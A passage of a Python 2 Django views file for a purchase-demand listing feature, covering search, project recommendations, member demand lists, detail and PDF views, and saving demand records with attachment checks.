industry_condition = Industry.objects.get(pk=industry)
condition.industry = industry_condition
is_has_condition = True
condition.country_id = country_id
condition.keyword = keyword
condition.type = type
sort = "time_desc"
if is_has_condition:
data, total = find_demands(condition, 1, 5, sort)
c['has_more'] = total > 5
c['demands'] = data
c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
c['is_search'] = True
c['is_has_condition'] = is_has_condition
c["SERVICE_TYPES"] = Demand.SERVICE_TYPES
c["countries"] = Helper.find_countries()
c["industries"] = Helper.find_industries_level1()
return render_to_response("purchase/"+request.lang+"/search.html", c, context_instance=RequestContext(request))
@member_login_required
def search_keyword(request):
c = {}
c['title'] = _("Search")
keyword = request.GET.get("keyword", '')
c['member'] = request.session.get('member', None)
member_id = request.session['member']['id']
member = get_object_or_404(Member,pk=member_id)
c["keyword"] = keyword
demands = Demand.objects.filter(Q(status=StatusDemand.approved) & (Q(name_cn__contains=keyword) | Q(name_en__contains=keyword)))
c['demands'] = demands[0:5]
c['total_project'] = Project.objects.filter(Q(status=StatusProject.approved) & (Q(name_cn__contains=keyword) | Q(name_en__contains=keyword))).count()
c['total_demand'] = demands.count()
c['total_news'] = News.objects.filter(Q(title__contains=keyword) | Q(tag__contains=keyword)).count()
c['total_company'] = Company.objects.filter(Q(short_name_cn__contains=keyword) | Q(short_name_en__contains=keyword)).exclude(id=27).count()
c['total_member'] = Member.objects.filter(Q(last_name__contains=keyword) | Q(first_name__contains=keyword)).count()
c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
write_search_demand_log(request,member,keyword)
return render_to_response("purchase/"+request.lang+"/search_keyword.html", c, context_instance=RequestContext(request))
@member_login_required
def new(request):
c = {}
c['title'] = _("New Purchase")
c['member'] = request.session.get('member', None)
# member_id = request.session['member']['id']
# demands = Demand.objects.filter(status=StatusDemand.approved)
# sort = request.GET.get("sort", "time_desc")
# c['sort'] = sort
# c[sort] = "active"
# if sort == "time_desc":
# demands = demands.order_by("-id")
# elif sort == "time_asc":
# demands = demands.order_by("id")
# check the preference is setting
# pi = PreferenceIndustry.objects.filter(preference__member__id=member_id, preference__title="demand")
# pn = PreferenceKeyword.objects.filter(preference__member__id=member_id, preference__title="demand")
# pl = PreferenceLocation.objects.filter(preference__member__id=member_id, preference__title="demand")
# if len(pi) == 0 and len(pl) == 0 and len(pn) == 0:
# c['need_preference'] = True
# c['demands'] = demands[0:50]
# else:
# c['need_preference'] = False
# c['demands'] = demands[0:10]
# check finish
member_id = request.session['member']['id']
type = request.GET.get('type', 0)
keyword = request.GET.get('keywords', '')
country_id = request.GET.get('country_id', 0)
province_id = request.GET.get('province_id', 0)
industry_id = request.GET.get('industry_id', 0)
sort = request.GET.get('sort', 'time_desc')
condition = ConditionDemand()
condition.country_id = country_id
condition.keyword = keyword
condition.status = StatusDemand.approved
condition.province_id = province_id
condition.type = type
level = 1
if industry_id != "" and industry_id != "0" and industry_id != 0:
condition.industry = Industry.objects.get(pk=industry_id)
level = condition.industry.level
pagesize = 10
data, total = find_demands(condition, 1, pagesize, sort)
c["have_more_data"] = len(data) == int(pagesize)
c['demands'] = data
c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
c['countries'] = Helper.find_countries()
c['industries'] = Helper.find_industries_level1()
c['total'] = total
return render_to_response("purchase/"+request.lang+"/new.html", c, context_instance=RequestContext(request))
@member_login_required
def banking_genius(request, id_post):
c = {}
c['title'] = _("New Purchase")
c['member'] = request.session.get('member', None)
try:
page = request.GET.get('page', 0)
pagesize = request.GET.get('pagesize', 10)
condition = recommendCondiction(request, id_post)
c["totalRecommend"] = RecommondProjectItem.objects.filter(condition).count()
c["recommendList"] = list(RecommondProjectItem.objects.filter(condition).order_by('-id'))[page : pagesize]
except Exception, e:
logger.error(e.message)
c["id"] = id_post
c["countries"] = Helper.find_countries()
c["industries"] = Helper.find_industries_level1()
c["project_title"] = Demand.objects.get(pk=id_post).name_cn
member_id = request.session['member']['id']
c['favorites_project_ids'] = Helper.find_member_favorite_project_ids(member_id)
return render_to_response("purchase/"+request.lang+"/banking_genius.html", c, context_instance=RequestContext(request))
@member_login_required
def json_recommend(request):
c = {}
id_post = request.POST.get("id", False)
if request.method == "POST":
try:
page = request.POST.get('page', 1)
pagesize = request.POST.get('pagesize', 10)
if page <= 1:
page = 1
if pagesize <= 1:
pagesize = 1
start_record = (int(page)-1) * int(pagesize)
end_record = int(start_record) + int(pagesize)
if id_post:
condition = recommendCondiction(request, id_post)
c["recommendList"] = list(RecommondProjectItem.objects.filter(condition).order_by('-id'))[start_record : end_record]
member_id = request.session['member']['id']
c['favorites_project_ids'] = Helper.find_member_favorite_project_ids(member_id)
except Exception, e:
logger.error(e. message)
return render_to_response("purchase/"+request.lang+"/json_recommend.html", c, context_instance=RequestContext(request))
@member_login_required
def json_recommend_count(request):
count = 0
id_post = request.POST.get("id", False)
if request.method == "POST":
try:
if id_post:
condition = recommendCondiction(request, id_post)
count = RecommondProjectItem.objects.filter(condition).count()
print count
except Exception, e:
logger.error(e. message)
return HttpResponse(count)
@member_login_required
def sync_recommond(request):
result = "success"
try:
if request.method == "POST":
id_post = request.POST.get("id", False)
if id_post:
d = Demand.objects.get(pk=id_post)
project_list=Project.objects.filter(status=2).filter(expire_date__gt=datetime.datetime.now()).order_by('-id')
update_project_recommond_list(d, project_list)
result = "success"
except Exception, e:
print e.message
logger.error(e.message)
return HttpResponse(result)
def recommendCondiction(request, id):
condition = Q(demand_id=id, is_delete=False)
condition2 = Q()
target_location_id = request.POST.get('target_location_id', 0)
target_industry_id = request.POST.get('target_industry_id', 0)
target_location_type = request.POST.get('target_location_type', 0)
if target_location_id != "0" and target_location_id != 0:
if target_location_type == "province":
condition2 = condition2 | Q (company_province=target_location_id)
else:
condition2 = condition2 | Q (company_country=target_location_id)
if target_industry_id != "0" and target_industry_id != 0:
condition2 = condition2 | Q (company_industry=target_industry_id)
if target_location_id != "0" or target_industry_id != "0":
p = Project.objects.filter(condition2)
condition = condition & Q (project=p)
return condition
def preferenceByMemberId(c, member_id):
list = []
preferences = Preference.objects.filter(member_id=member_id, title="demand")[0: 1]
condition = Q(status=StatusDemand.approved)
if len(preferences) > 0:
condition2 = Q()
p = preferences[0]
c['preference_demand_id'] = p.id
preference_project_industries = p.preference_industry.all() #PreferenceIndustry.objects.filter(preference__member__id=member['id'])
c['pre_demand_indusrtis'] = preference_project_industries
if len(preference_project_industries) > 0:
for ppi in preference_project_industries:
condition2 = condition2 | Q (company_industries=ppi.industry_id)
preference_project_location = p.preference_location.all()
c['pre_demand_locations'] = preference_project_location
if len(preference_project_location):
for ppl in preference_project_location:
condition2 = condition2 | Q (company_countries=ppl.country_id)
condition = condition & condition2
list = Demand.objects.filter(condition).order_by("-id").distinct()[0: 3]
return list
def demandByMemberId(member_Id):
demands = Demand.objects.filter(member_id=member_Id, status=StatusDemand.approved).order_by("-id")[0: 5]
list_demand = []
for demand in demands:
count_message = Message.objects.filter(type_relation=2, demand=demand.id, is_read=0).count()
count_favor = Favorites.objects.filter(type_relation=1, demand=demand.id).count()
company_industries = demand.company_industries.all()
count_company = 0
count_industry = 0
if company_industries:
industry_ids = []
industry_level_1_id = []
for c in company_industries:
industry_ids.append(c.id)
industry_level = c.level
industry_id = c.id
if industry_level == 2:
industry_id = c.father_id
elif industry_level == 3:
industry_id = c.father.father_id
industry_level_1_id.append(industry_id)
count_company = Company.objects.filter(industry__in=industry_ids, status=1).exclude(id=27).count()
#start_date = datetime.date(datetime.datetime.today().year, datetime.datetime.today().month - 3, datetime.datetime.today().day)
start_date = datetime.datetime.today()-datetime.timedelta(days=90)
count_industry = Deal.objects.filter(cv1__in=industry_level_1_id, happen_date__gt=start_date).count()
pro = {}
pro["demand"] = demand
pro["count_message"] = count_message
pro["count_favor"] = count_favor
pro["count_industry"] = count_industry
pro["count_company"] = count_company
list_demand.append(pro)
return list_demand
def countDemandStuffTotal(member_id):
pvs = Demand.objects.filter(member_id=member_id, status=StatusDemand.approved).aggregate(sum_pv=Sum('pv'))
messages = 0#Message.objects.filter(type_relation=2, demand__member__id=member_id, is_read=0, is_delete=0).count()
favorites = Favorites.objects.filter(type_relation=2, demand__member__id=member_id).count()
cursor = connection.cursor()
demands = Demand.objects.filter(member_id=member_id, status=StatusDemand.approved)
industry_ids = []
industry_ids_cv1 = []
if demands:
for d in demands:
for cv1 in d.demand_industries.all():
industry_ids_cv1.append(cv1.cv1)
for industry in d.company_industries.all():
industry_ids.append(industry.id)
recommend_companies = Company.objects.filter(industry__in=set(industry_ids), status=1).exclude(id=27).count()
#start_date = datetime.date(datetime.datetime.today().year, datetime.datetime.today().month - 3, datetime.datetime.today().day)
start_date = datetime.datetime.today()-datetime.timedelta(days=90)
recommend_industries = Deal.objects.filter(cv1__in=set(industry_ids_cv1), happen_date__gt=start_date).count()
count_demand_all = {}
count_demand_all["pvs"] = pvs["sum_pv"]
count_demand_all["messages"] = messages
count_demand_all["favorites"] = favorites
count_demand_all["recommend_companies"] = recommend_companies
count_demand_all["recommend_industries"] = recommend_industries
return count_demand_all
@csrf_exempt
@member_login_required
def json_index(request):
c = {}
member_id = request.session['member']['id']
if request.method == 'POST':
try:
condition = Q(status=StatusDemand.approved)
condition2 = Q()
industryIds = request.GET.get("industryId", False)
if industryIds and industryIds != "0":
ids = industryIds.split(",")
for id in ids:
condition2 = condition2 | Q(company_industries=id)
locationIds = request.GET.get("locationId", False)
if locationIds and locationIds != "0":
ids = locationIds.split(",")
for id in ids:
condition2 = condition2 | Q(company_countries=id)
condition = condition & condition2
if industryIds == False and locationIds == False:
result_list = preferenceByMemberId(c, member_id)
else:
result_list = Demand.objects.filter(condition).order_by("-id").distinct()[0 : 3]
c["result_list"] = result_list
list_demand_preference_plus = 3 - len(result_list)
if list_demand_preference_plus > 0:
c['recent_demand'] = Demand.objects.filter(status=StatusDemand.approved).order_by("-id")[0: list_demand_preference_plus]
except Exception, e:
# print e.message
logger.error('show demand json error!' + e.message)
c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
return render_to_response("purchase/"+request.lang+"/json_index.html", c, context_instance=RequestContext(request))
def countResult(result):
resultList = {}
# total_recommends = RecommondItem.objects.filter(is_delete=0, project__id=result.id).count()
total_favorites = Favorites.objects.filter(type_relation=2, demand__id=result.id).count()
not_read_messages = Message.objects.filter(type_relation=2, demand__id=result.id, is_read=0).count()
resultList['total_recommends'] = RecommondProjectItem.objects.filter(demand=result, project__status=StatusProject.approved).count()
resultList['total_target'] = 0
resultList['total_favorites'] = total_favorites
resultList['not_read_messages'] = not_read_messages
resultList['id'] = result.id
resultList['name_cn'] = result.name_cn
resultList['name_en'] = result.name_en
resultList['status'] = result.status
resultList['statusName'] = result.get_status_display
resultList['processName'] = result.get_process_display
resultList['add_time'] = result.add_time
resultList['pvs'] = result.pv
resultList['integrity'] = result.integrity
return resultList
@member_login_required
def mylist(request, type):
c = {}
c.update(request)
c['member'] = request.session.get('member', None)
member_id = request.session['member']['id']
demands = Demand.objects.filter(member_id=member_id).exclude(status=StatusDemand.deleted).order_by("-id")
c['total_all'] = demands.count()
result_list_2 = []
for result in demands:
result_list_2.append(countResult(result))
c['demands'] = result_list_2
c[type] = "active"
c['type'] = type
'''
demands_release = demands.filter(status=StatusDemand.approved)
demands_draft = demands.filter(status=StatusDemand.draft)
demands_pending = demands.filter(status=StatusDemand.pending)
demands_not_approved = demands.filter(status=StatusDemand.not_approved)
demands_offline = demands.filter(status=StatusDemand.offline)
demands_expired = demands.filter(expire_date__gt=datetime.datetime.today).exclude(status=StatusDemand.deleted)
d_list = {"release": demands_release, "draft": demands_draft, "pending": demands_pending, "not_approved": demands_not_approved, "expired": demands_expired}
d_list.update({"offline": demands_offline, "all": demands})
result_list = d_list.get(type, demands)
result_list_2 = []
for result in result_list:
result_list_2.append(countResult(result))
c['result_list'] = result_list_2
total_all = demands.count()
total_release = demands_release.count()
total_pending = demands_pending.count()
total_draft = demands_draft.count()
total_offline = demands_offline.count()
total_not_approved = demands_not_approved.count()
c['total_all'] = total_all
c['total_release'] = total_release
c['total_pending'] = total_pending
c['total_offline'] = total_offline
c['total_not_approved'] = total_not_approved
c['total_draft'] = total_draft
total_project = Project.objects.filter(member_id=member_id).exclude(status=StatusDemand.deleted).count()
c['total_project'] = total_project
c[type] = "active"
c['type'] = type
c['demands'] = result_list_2
'''
return render_to_response("purchase/"+request.lang+"/mylist.html", c, context_instance=RequestContext(request))
'''
@member_login_required
def mylist(request, type, id=0):
c = {}
c.update(request)
c['title'] = _("My Purchases")
c['member'] = request.session.get('member', None)
member_id = request.session['member']['id']
demands = Demand.objects.filter(member_id=member_id).exclude(status=StatusDemand.deleted).order_by("-update_time")
demands_public = demands.filter(target_members=None, target_companies=None, target_industries=None)
demands_private = demands.exclude(target_members=None, target_companies=None, target_industries=None)
demands_release = demands.filter(status=StatusDemand.approved)
demands_draft = demands.filter(status=StatusDemand.draft)
demands_pending = demands.filter(status=StatusDemand.pending)
demands_not_approved = demands.filter(status=StatusDemand.not_approved)
demands_offline = demands.filter(status=StatusDemand.offline)
demands_expired = demands.filter(expire_date__gt=datetime.datetime.today).exclude(status=StatusDemand.deleted)
d_list = {"release": demands_release, "draft": demands_draft, "pending": demands_pending, "not_approved": demands_not_approved, "expired": demands_expired}
d_list.update({"offline": demands_offline, "all": demands, "public": demands_public, "private": demands_private})
result_list = d_list.get(type, demands)
total = result_list.count()
c['total'] = total
total_all = demands.count()
total_public = demands_public.count()
total_private = demands_private.count()
total_draft = demands_draft.count()
c['total_all'] = total_all
c['total_public'] = total_public
c['total_private'] = total_private
c['total_draft'] = total_draft
total_project = Project.objects.filter(member_id=member_id).exclude(status=StatusDemand.deleted).count()
c['total_project'] = total_project
if total == 0:
return render_to_response("purchase/"+request.lang+"/mylist_empty.html", c, context_instance=RequestContext(request))
ids = []
for m in result_list:
ids.append(m.id)
id_current = int(id)
if id_current == 0:
demand = result_list[0]
id_current = demand.id
else:
if id_current not in ids:
raise Http404
pageIndex = ids.index(id_current)+1
demand = result_list[pageIndex-1]
pageIndex = ids.index(id_current)+1
#c['result_list'] = result_list
pageTotal = total
c['pageTotal'] = pageTotal
page_start = 1
page_end = 10
if pageIndex >= 5:
page_start = pageIndex - 4
page_end = pageIndex + 5
if page_end > pageTotal:
page_end = pageTotal
pages = ids[page_start-1:page_end]
id_list_top = enumerate(pages, start=page_start)
id_list = enumerate(pages, start=page_start)
c['id_list_top'] = id_list_top
c['id_list'] = id_list
c['page_start'] = page_start
c['page_end'] = page_end
c[type] = "active"
c['type'] = type
c['d'] = demand
c['pageIndex'] = pageIndex
c['id_current'] = id_current
c['first_id'] = ids[0]
c['end_id'] = ids[total-1]
if pageIndex > 1:
c['pre_id'] = ids[pageIndex-1]
if pageIndex < pageTotal:
c['next_id'] = ids[pageIndex]
if page_end < pageTotal:
c['next_id_page_end'] = ids[page_end]
visitors = DemandVisitor.objects.filter(demand_id=demand.id).order_by("-add_time")
c['visitors'] = visitors
c['visitors_count'] = visitors.count()
followers = Favorites.objects.filter(demand_id=demand.id).order_by("-add_time")
c['followers'] = followers
message_list = Message.objects.filter(demand_id=demand.id).order_by("-add_time")
c['message_list'] = message_list
if len(demand.company_industries.all())>0:
#之后用cv1替代
if demand.company_industries.all()[0].level==3:
c['deal_list_more_id']=demand.company_industries.all()[0].father.father.id
elif demand.company_industries.all()[0].level==2:
c['deal_list_more_id']=demand.company_industries.all()[0].father.id
else:
c['deal_list_more_id']=demand.company_industries.all()[0].id
c['deal_list'] =Deal.objects.filter(cv1=c['deal_list_more_id']).order_by('-update_time')[0:10]
c['compare_cn']= CompanyWithPE.objects.filter(country__name_en='China',industry__id=c['deal_list_more_id']).order_by('-ps')[0:5]
c['compare_usa']= CompanyWithPE.objects.filter(country__name_en='United States of America',industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
c['compare_hk']= CompanyWithPE.objects.filter(country__name_en='Hong Kong',industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
c['compare_uk']= CompanyWithPE.objects.filter(country__name_en='United Kingdom',industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
return render_to_response("purchase/"+request.lang+"/mylist.html", c, context_instance=RequestContext(request))
'''
@member_login_required
def mydetail(request, id):
c = {}
member = request.session.get('member', None)
c['member'] = member
member_id = request.session['member']['id']
demand = get_object_or_404(Demand, pk=id, member_id=member_id)
# c['d'] = demand
m = countResult(demand)
c['process'] = Demand.PROCESS
c['d'] = m
_visitors = DemandVisitor.objects.filter(demand_id=demand.id).order_by("-add_time")[0:8]
visitors=[]
c['recommendList'] = RecommondProjectItem.objects.filter(demand=demand, project__status=StatusProject.approved).order_by("project__update")[0:5]
for v in _visitors:
if v.member.email.find('@newchama.com')==-1:
visitors.append(v)
c['visitors'] = visitors
c['visitors_count'] = len(visitors)
followers = Favorites.objects.filter(demand_id=demand.id).order_by("-add_time")
c['followers'] = followers
message_list = Message.objects.filter(demand_id=demand.id).order_by("-add_time")
c['message_list'] = message_list
if len(demand.company_industries.all()) > 0:
#之后用cv1替代
if demand.company_industries.all()[0].level == 3:
c['deal_list_more_id'] = demand.company_industries.all()[0].father.father.id
elif demand.company_industries.all()[0].level == 2:
c['deal_list_more_id'] = demand.company_industries.all()[0].father.id
else:
c['deal_list_more_id'] = demand.company_industries.all()[0].id
c['deal_list'] = Deal.objects.filter(cv1=c['deal_list_more_id']).order_by('-update_time')[0:10]
c['compare_cn'] = CompanyWithPE.objects.filter(country__name_en='China', industry__id=c['deal_list_more_id']).order_by('-ps')[0:5]
c['compare_usa'] = CompanyWithPE.objects.filter(country__name_en='United States of America', industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
c['compare_hk'] = CompanyWithPE.objects.filter(country__name_en='Hong Kong', industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
c['compare_uk'] = CompanyWithPE.objects.filter(country__name_en='United Kingdom', industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
return render_to_response("purchase/"+request.lang+"/mydetail.html", c, context_instance=RequestContext(request))
def ajax_more(request):
c = {}
member = request.session.get('member', None)
if member is None:
return None
member_id = request.session['member']['id']
page = request.GET.get('page', 1)
pagesize = request.GET.get('pagesize', 10)
type = request.GET.get('type', 0)
keyword = request.GET.get('keywords', '')
country_id = request.GET.get('country_id', 0)
province_id = request.GET.get('province_id', 0)
industry_id = request.GET.get('industry_id', 0)
sort = request.GET.get('sort', 'time_desc')
condition = ConditionDemand()
condition.country_id = country_id
condition.keyword = keyword
condition.status = StatusDemand.approved
condition.province_id = province_id
condition.type = type
level = 1
if industry_id != "" and industry_id != "0" and industry_id != 0:
condition.industry = Industry.objects.get(pk=industry_id)
level = condition.industry.level
data, total = find_demands(condition, page, pagesize, sort)
c['demands'] = data
c["have_more_data"] = len(data) == int(pagesize)
c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
return render_to_response("purchase/"+request.lang+"/ajax_list.html", c, context_instance=RequestContext(request))
@member_login_required
@csrf_protect
def add(request):
c = {}
c.update(csrf(request))
c['title'] = _("Add Purchase")
c['member'] = request.session.get('member', None)
u = Demand()
u.valid_day = 60
# if request.method == "POST":
# u = Demand()
# name_en = request.POST["name_en"]
# name_cn = request.POST["name_cn"]
# if name_en == "" and name_cn == "":
# isvalid = False
# messages.warning(request, _("please input demand name"))
# submitStatus = request.POST["submitStatus"]
# redirect_url = "purchase.mylist_pending"
# if submitStatus == "draft":
# u.status = StatusDemand.draft
# redirect_url = "purchase.mylist_draft"
# else:
# u.status = StatusDemand.pending
# _bind_data(request, u)
# if isvalid:
# try:
# u.financial_year = datetime.datetime.today().year
# u.save()
# _save_items(request, u)
# return redirect(redirect_url)
# except Exception, e:
# messages.warning(request, e.message)
# logging.error(e.message)
c['target_companies_count'] = 0
c["u"] = u
c['readSuitorRelate'] = False
_load_types(c)
return render_to_response("purchase/"+request.lang+"/add.html", c, context_instance=RequestContext(request))
@member_login_required
@csrf_protect
def edit(request, id):
c = {}
c.update(csrf(request))
c['title'] = _("Edit Purchase")
c['member'] = request.session.get('member', None)
member_id = c['member']['id']
isvalid = True
u = get_object_or_404(Demand, pk=id, member_id=member_id)
c['attachments'] = u.demand_attach.all()
c['u'] = u
c["other_target_companies"] = DemandOtherTargetCompany.objects.filter(demand__id=u.id)
countrySelected = u.company_countries.all()
if countrySelected:
c['company_country'] = countrySelected[0]
provinceSelected = u.company_provinces.all()
if provinceSelected:
c['company_province'] = provinceSelected[0]
industrySelected = u.demand_industries.all()
if industrySelected:
c['company_industry'] = industrySelected[0]
c['target_companies_count'] = u.target_companies.all().count()
c['readSuitorRelate'] = True
if request.lang == "en-us":
mks = u.demand_keyword_en.all()
else:
mks = u.demand_keyword.all()
c['mks'] = mks
keywords = ""
if len(mks) > 0:
for m in mks:
keywords += m.keyword + ","
keywords = keywords[0 : len(keywords) - 1]
c['keywords'] = keywords
_load_types(c)
member = get_object_or_404(Member,id=member_id)
write_demand_edit_log(request,member,u)
return render_to_response("purchase/"+request.lang+"/add.html", c, context_instance=RequestContext(request))
@member_login_required
def detail(request, id):
c = {}
c['title'] = _("Purchase Detail")
member = request.session.get('member', None)
c['member'] = member
member_id = request.session['member']['id']
if Helper.hasAgentRole(member['company_type']):
messages.warning(request, _("You have no permission to visit this page"))
return render_to_response("services/error_message.html", c, context_instance=RequestContext(request))
demand = get_object_or_404(Demand, pk=id)
if demand.status != StatusDemand.approved and demand.member_id != member_id:
raise Http404
if demand.is_suitor:
if demand.is_push_to_member(member) is False and demand.member_id != member_id:
messages.warning(request, _("not target"))
return render_to_response("services/error_message.html", c, context_instance=RequestContext(request))
# return HttpResponse(_("not target"))
c['d'] = demand
#c['last_year'] = demand.financial_year-1
#demands_other = Demand.objects.filter(member_id=demand.member_id, status=StatusDemand.approved, is_anonymous=False).exclude(id=id)[0:5]
#c['demands_other'] = demands_other
#demands_recommend = Demand.objects.filter(service_type=demand.service_type, status=StatusDemand.approved).exclude(id=id).order_by("-pv")[0:5]
#c['demands_recommend'] = demands_recommend
c['message_list'] = Message.objects.filter(type_relation=2, demand=demand, is_delete=0).order_by('-add_time')
if demand.member_id == member_id:
c['is_own'] = True
member = Member.objects.get(id=member_id)
member.view_demand(demand)
if request.lang == "en-us":
mks = demand.demand_keyword_en.all()
else:
mks = demand.demand_keyword.all()
keywords = ""
if len(mks) > 0:
for m in mks:
keywords += m.keyword + ","
keywords = keywords[0 : len(keywords) - 1]
c['keywords'] = keywords
c['is_added_favorite'] = member.is_added_demand_to_favorites(demand)
c['is_expired']=datetime.date.today() > demand.expire_date
url = "/detail.html"
type = request.GET.get("type", "")
c['type'] = type
if type == "1":
url = "/view.html"
else:
write_demand_view_log(request,member,demand, type)
return render_to_response("purchase/"+request.lang+ url, c, context_instance=RequestContext(request))
@member_login_required
def pdf(request, id):
reload(sys)
sys.setdefaultencoding('utf8')
c = {}
c['title'] = _("Purchase Detail")
c['member'] = request.session.get('member', None)
member_id = request.session['member']['id']
demand = get_object_or_404(Demand, pk=id)
member = Member.objects.get(pk=member_id)
if demand.status != StatusDemand.approved and demand.member_id != member_id:
raise Http404
if demand.is_suitor:
if demand.is_push_to_member(member) is False and demand.member_id != member_id:
return HttpResponse(_("not target"))
c['d'] = demand
c['last_year'] = demand.financial_year-1
c['static_root'] = settings.STATICFILES_DIRS[0]
template = get_template("purchase/"+request.lang+"/detail_pdf.html")
html = template.render(Context(c))
#print(html)
file = StringIO.StringIO()
#file = open(os.path.join(settings.MEDIA_ROOT, 'test.pdf'), "w+b")
pisaStatus = pisa.CreatePDF(html, dest=file)
# Return PDF document through a Django HTTP response
file.seek(0)
pdf = file.read()
file.close() # Don't forget to close the file handle
member.print_demand(demand)
write_demand_teaser_view_log(request,member,demand)
return HttpResponse(pdf, mimetype='application/pdf')
@member_login_required
def save(request):
response_data = {}
response_data['result'] = 'failed'
if request.method == "POST":
try:
name_en = request.POST["name_en"]
name_cn = request.POST["name_cn"]
if name_en == "" and name_cn == "":
response_data['message'] = _("please input demand name")
else:
#check stock_symbol is correct
company_stock_symbol = request.POST.get("company_stock_symbol", False)
is_list_company = int(request.POST.get("is_list_company", 0))
if company_stock_symbol and is_list_company == 1:
checksymbolExsit = ListedCompany.objects.filter(stock_symbol=company_stock_symbol)
if len(checksymbolExsit) == 0:
response_data['message'] = 'symbolNotExsit'
return HttpResponse(simplejson.dumps(response_data), content_type="text/plain")
submitStatus = request.POST["submitStatus"]
u = Demand()
isExsit = False
id_post = request.POST.get("id", False)
#check the demand is exsit with member_id
condition = Q(member_id=request.session["member"]["id"])
condition2 = Q()
if id_post:
condition = condition & ~Q(pk=id_post)
if name_cn.strip() != "":
condition2 = condition2 | Q(name_cn=name_cn.strip())
if name_en.strip() != "":
condition2 = condition2 | Q(name_en=name_en.strip())
project = Demand.objects.filter(condition & condition2)
if project:
isExsit = True
response_data['message'] = "demandExsit"
if isExsit is False:
if id_post:
u = Demand.objects.get(pk=id_post)
if u.status != StatusDemand.approved: #Terry mark, when the project is approved then do not reset the pending status
if submitStatus == "draft":
u.status = StatusDemand.draft
else:
u.status = StatusDemand.pending
bool, msg = _bind_data(request, u)
if bool:
response_data['result'] = 'success'
response_data['id'] = u.id
response_data['message'] = '操作成功'
else:
response_data['message'] = msg
except Exception, e:
logger.error(e.message)
response_data['message'] = e.message
return HttpResponse(simplejson.dumps(response_data), content_type="text/plain")
def _load_types(c):
c["current_year"] = datetime.datetime.today().year
c["last_year"] = datetime.datetime.today().year-1
c["FINANCIAL_TYPES"] = Demand.FINANCIAL_TYPES
c["FINANCIAL_TYPES_2"] = Demand.FINANCIAL_TYPES_2
c["STOCK_STRUCTURE_PERCENTAGE_TYPES"] = Demand.STOCK_STRUCTURE_PERCENTAGE_TYPES
c["CURRENCY_TYPES"] = Demand.CURRENCY_TYPES
c["EMPLOYEES_COUNT_TYPES"] = Demand.EMPLOYEES_COUNT_TYPES
c["SERVICE_TYPES"] = Demand.SERVICE_TYPES
c["SERVICE_TYPES_2"] = Demand.SERVICE_TYPES_2
c["countries"] = Helper.find_countries()
c["industries"] = Helper.find_industries_level1()
c["members"] = Member.objects.all()
c["companies"] = Company.objects.all().exclude(id=27)
def _bind_data(request, u):
has_attach = False
upload_types = request.POST.getlist("upload_types", [])
for ut in upload_types:
uf = request.FILES.get("upload_file_" + ut, False)
if uf:
file_ext = os.path.splitext(uf.name)[1].lower()
if uf.size > 20000000:
return False, "tooBig"
#return _("The file cannot be more than 20M")
if file_ext != ".doc" and file_ext != ".docx" and file_ext != ".pdf" and file_ext != ".ppt" and file_ext != ".pptx":
return False, "typeError"
#return _("The file must be 'doc|docx|pdf'")
has_attach = True
integrity = 0
u.name_cn = request.POST.get("name_cn", None)
u.name_en = request.POST.get("name_en", None)
if request.POST.get("name_cn", False) or request.POST.get("name_en", False):
integrity = integrity + 1
if request.POST.get("service_type", False):
u.service_type = request.POST["service_type"]
integrity = integrity + 1
pay_currency = request.POST.get("pay_currency", False)
if pay_currency and pay_currency != "":
u.pay_currency = pay_currency.replace(",", "")
integrity = integrity + 1
u.is_list_company = int(request.POST.get("is_list_company", 0))
integrity = integrity + 1
project_relation = request.POST.get("project_relation", False)
if project_relation and project_relation != "":
u.project_relation = project_relation.replace(",", "")
integrity = integrity + 1
valid_day = int(request.POST.get("valid_day", 0))
u.valid_day = valid_day
u.expire_date = datetime.datetime.today() + datetime.timedelta(days=int(valid_day))
integrity = integrity + 1
u.is_anonymous = int(request.POST.get("is_anonymous", "0"))
integrity = integrity + 1
exist_upload_names = request.POST.getlist("exist_upload_names", [])
if has_attach or exist_upload_names:
integrity = integrity + 1
u.has_attach = True
else:
u.has_attach = False
#country
#industry
#project_keyword
u.employees_count_type = request.POST.get("employees_count_type", None)
if request.POST.get("employees_count_type", False):
integrity = integrity + 1
if request.POST.get("stock_structure_percentage_type_institutional", False):
u.stock_structure_percentage_type_institutional = request.POST["stock_structure_percentage_type_institutional"]
if request.POST.get("stock_structure_percentage_type_management", False):
u.stock_structure_percentage_type_management = request.POST["stock_structure_percentage_type_management"]
if request.POST.get("stock_structure_percentage_type_private", False):
u.stock_structure_percentage_type_private = request.POST["stock_structure_percentage_type_private"]
if request.POST.get("stock_structure_percentage_type_institutional", False) or request.POST.get("stock_structure_percentage_type_institutional", False) or request.POST.get("stock_structure_percentage_type_private", False):
integrity = integrity + 1
u.currency_type_financial = request.POST.get("currency_type", None)
integrity = integrity + 1
expected_enterprice_value_enter = request.POST.get("expected_enterprice_value_enter", False)
if expected_enterprice_value_enter and expected_enterprice_value_enter != "":
u.expected_enterprice_value_enter = expected_enterprice_value_enter.replace(",", "")
integrity = integrity + 1
#new column
stock_percent = request.POST.get("stock_percent", False)
if stock_percent and stock_percent != "":
u.stock_percent = stock_percent
integrity = integrity + 1
deal_size_enter = request.POST.get("deal_size_enter", False)
if deal_size_enter and deal_size_enter != "":
u.deal_size_enter = deal_size_enter.replace(",", "")
integrity = integrity + 1
income_last_phase_enter = request.POST.get("income_last_phase_enter", False)
if income_last_phase_enter and income_last_phase_enter != "":
u.income_last_phase_enter = income_last_phase_enter.replace(",", "")
integrity = integrity + 1
profit_last_phase_enter = request.POST.get("profit_last_phase_enter", False)
if profit_last_phase_enter and profit_last_phase_enter != "":
u.profit_last_phase_enter = profit_last_phase_enter.replace(",", "")
integrity = integrity + 1
ebitda = request.POST.get("ebitda", False)
if ebitda and ebitda != "":
u.ebitda = ebitda.replace(",", "")
integrity = integrity + 1
u.audit_status = int(request.POST.get("audit_status", 0))
integrity = integrity + 1
u.process = request.POST.get("process", 0)
'''
no input start
'''
member_id = request.session["member"]["id"]
if member_id != "0" and member_id != "":
